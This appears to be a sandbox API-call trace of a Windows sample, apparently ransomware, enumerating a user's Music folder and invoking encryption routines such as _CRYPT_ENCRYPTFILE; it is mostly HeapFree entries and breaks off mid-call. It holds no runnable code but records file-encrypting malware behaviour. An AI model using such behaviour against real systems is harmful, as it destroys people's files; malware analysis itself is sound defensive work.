CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="J1lagIQtz\\K4cO 93Mbgwb3udHm.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0184.181] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1lagIQtz\\K4cO 93Mbgwb3udHm.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0184.181] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="lagIQtz\\K4cO 93Mbgwb3udHm.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0184.181] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="agIQtz\\K4cO 93Mbgwb3udHm.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0184.181] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="gIQtz\\K4cO 93Mbgwb3udHm.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0184.181] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="IQtz\\K4cO 93Mbgwb3udHm.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0184.181] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Qtz\\K4cO 93Mbgwb3udHm.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0184.181] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tz\\K4cO 93Mbgwb3udHm.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0184.181] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\K4cO 93Mbgwb3udHm.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0184.181] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\K4cO 93Mbgwb3udHm.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0184.181] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="K4cO 93Mbgwb3udHm.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0184.181] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="4cO 93Mbgwb3udHm.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0184.181] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cO 93Mbgwb3udHm.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0184.181] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="O 93Mbgwb3udHm.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0184.181] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" 93Mbgwb3udHm.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0184.181] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="93Mbgwb3udHm.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0184.181] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="3Mbgwb3udHm.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0184.181] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Mbgwb3udHm.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0184.181] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="bgwb3udHm.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0184.181] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="gwb3udHm.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0184.181] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wb3udHm.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0184.181] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="b3udHm.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0184.181] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="3udHm.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0184.182] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0184.182] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0184.182] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0184.182] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0184.182] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deb78 | out: hHeap=0x8a0000) returned 1 [0184.182] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0184.182] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0184.182] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0184.182] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0184.182] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0184.182] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0184.182] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf310 | out: hHeap=0x8a0000) returned 1 [0184.182] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0184.182] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0184.182] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0184.182] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf310 | out: hHeap=0x8a0000) returned 1 [0184.182] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0184.182] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0184.182] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0184.182] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0184.182] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0184.182] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0184.183] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0184.183] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0184.183] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0184.183] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0184.183] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0184.183] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="a", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0184.183] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="4a", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0184.183] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="m4a", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0184.183] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".m4a", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0184.183] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0184.183] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0184.183] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0184.183] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0184.183] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0184.183] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0184.183] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def38 | out: hHeap=0x8a0000) returned 1 [0184.183] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0184.183] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0184.183] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0184.183] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0184.183] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0184.183] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0184.183] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0184.183] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0184.183] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0184.183] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0184.183] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0184.183] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df168 | out: hHeap=0x8a0000) returned 1 [0184.184] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0184.184] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0184.184] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0184.184] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0184.184] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0184.184] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0184.184] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0184.184] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0184.184] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0184.184] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec40 | out: hHeap=0x8a0000) returned 1 [0184.184] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0184.184] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0184.184] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0184.184] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0184.184] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0184.184] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0184.184] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0184.184] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0184.184] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0184.184] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0184.184] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec40 | out: hHeap=0x8a0000) returned 1 [0184.184] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0184.184] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0184.184] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0184.184] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0184.184] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0184.185] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0184.185] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0a8 | out: hHeap=0x8a0000) returned 1 [0184.185] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0184.185] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded58 | out: hHeap=0x8a0000) returned 1 [0184.185] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0184.185] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df028 | out: hHeap=0x8a0000) returned 1 [0184.185] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0184.185] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0184.185] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0184.185] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0184.185] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def88 | out: hHeap=0x8a0000) returned 1 [0184.185] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0184.185] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def38 | out: hHeap=0x8a0000) returned 1 [0184.185] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0184.185] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0184.185] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee48 | out: hHeap=0x8a0000) returned 1 [0184.185] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0184.185] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df140 | out: hHeap=0x8a0000) returned 1 [0184.185] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0184.185] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0184.185] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dead8 | out: hHeap=0x8a0000) returned 1 [0184.185] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0184.185] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0184.185] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deda8 | out: hHeap=0x8a0000) returned 1 [0184.186] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c3478 | out: hHeap=0x8a0000) returned 1 [0184.186] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0184.186] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0184.186] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0184.186] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0184.186] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0184.186] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0184.186] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0184.186] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0184.186] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0184.186] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0184.186] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0184.186] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0184.186] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0184.186] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0184.186] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0184.186] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0184.186] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0184.186] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0184.186] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0184.186] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0184.186] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0184.187] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0184.187] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0184.187] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0184.187] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0184.187] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0184.187] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0184.187] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\K4cO 93Mbgwb3udHm.m4a", lpFindFileData=0x87edb8 | out: lpFindFileData=0x87edb8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x822c4ab0, ftCreationTime.dwHighDateTime=0x1d5dcc0, ftLastAccessTime.dwLowDateTime=0x45537f10, ftLastAccessTime.dwHighDateTime=0x1d5e179, ftLastWriteTime.dwLowDateTime=0x45537f10, ftLastWriteTime.dwHighDateTime=0x1d5e179, nFileSizeHigh=0x0, nFileSizeLow=0x64c5, dwReserved0=0x87ef08, dwReserved1=0x8a7560, cFileName="K4cO 93Mbgwb3udHm.m4a", cAlternateFileName="K4CO93~1.M4A")) returned 0x90af58 [0184.187] FindClose (in: hFindFile=0x90af58 | out: hFindFile=0x90af58) returned 1 [0184.187] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0184.187] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0184.187] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dedf8 | out: hHeap=0x8a0000) returned 1 [0184.187] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0184.187] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0184.187] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0184.187] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0184.187] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0184.187] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0184.188] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0184.188] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8debf0 | out: hHeap=0x8a0000) returned 1 [0184.188] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0184.188] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0184.188] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0184.188] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0184.188] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0184.188] PeekMessageW (in: lpMsg=0x87ecf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ecf4) returned 0 [0184.188] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0184.188] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0184.188] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0184.188] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0184.188] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0184.188] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0184.188] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0184.188] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0184.188] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0184.188] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0184.188] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0184.188] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x74f20000 [0184.189] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0184.189] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0184.189] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deba0 | out: hHeap=0x8a0000) returned 1 [0184.189] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0184.189] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0184.189] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0184.189] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0184.189] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0184.189] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0184.189] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0184.189] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0184.189] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0184.189] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0184.189] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0184.189] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0184.189] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0184.189] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0184.189] HeapFree (in: 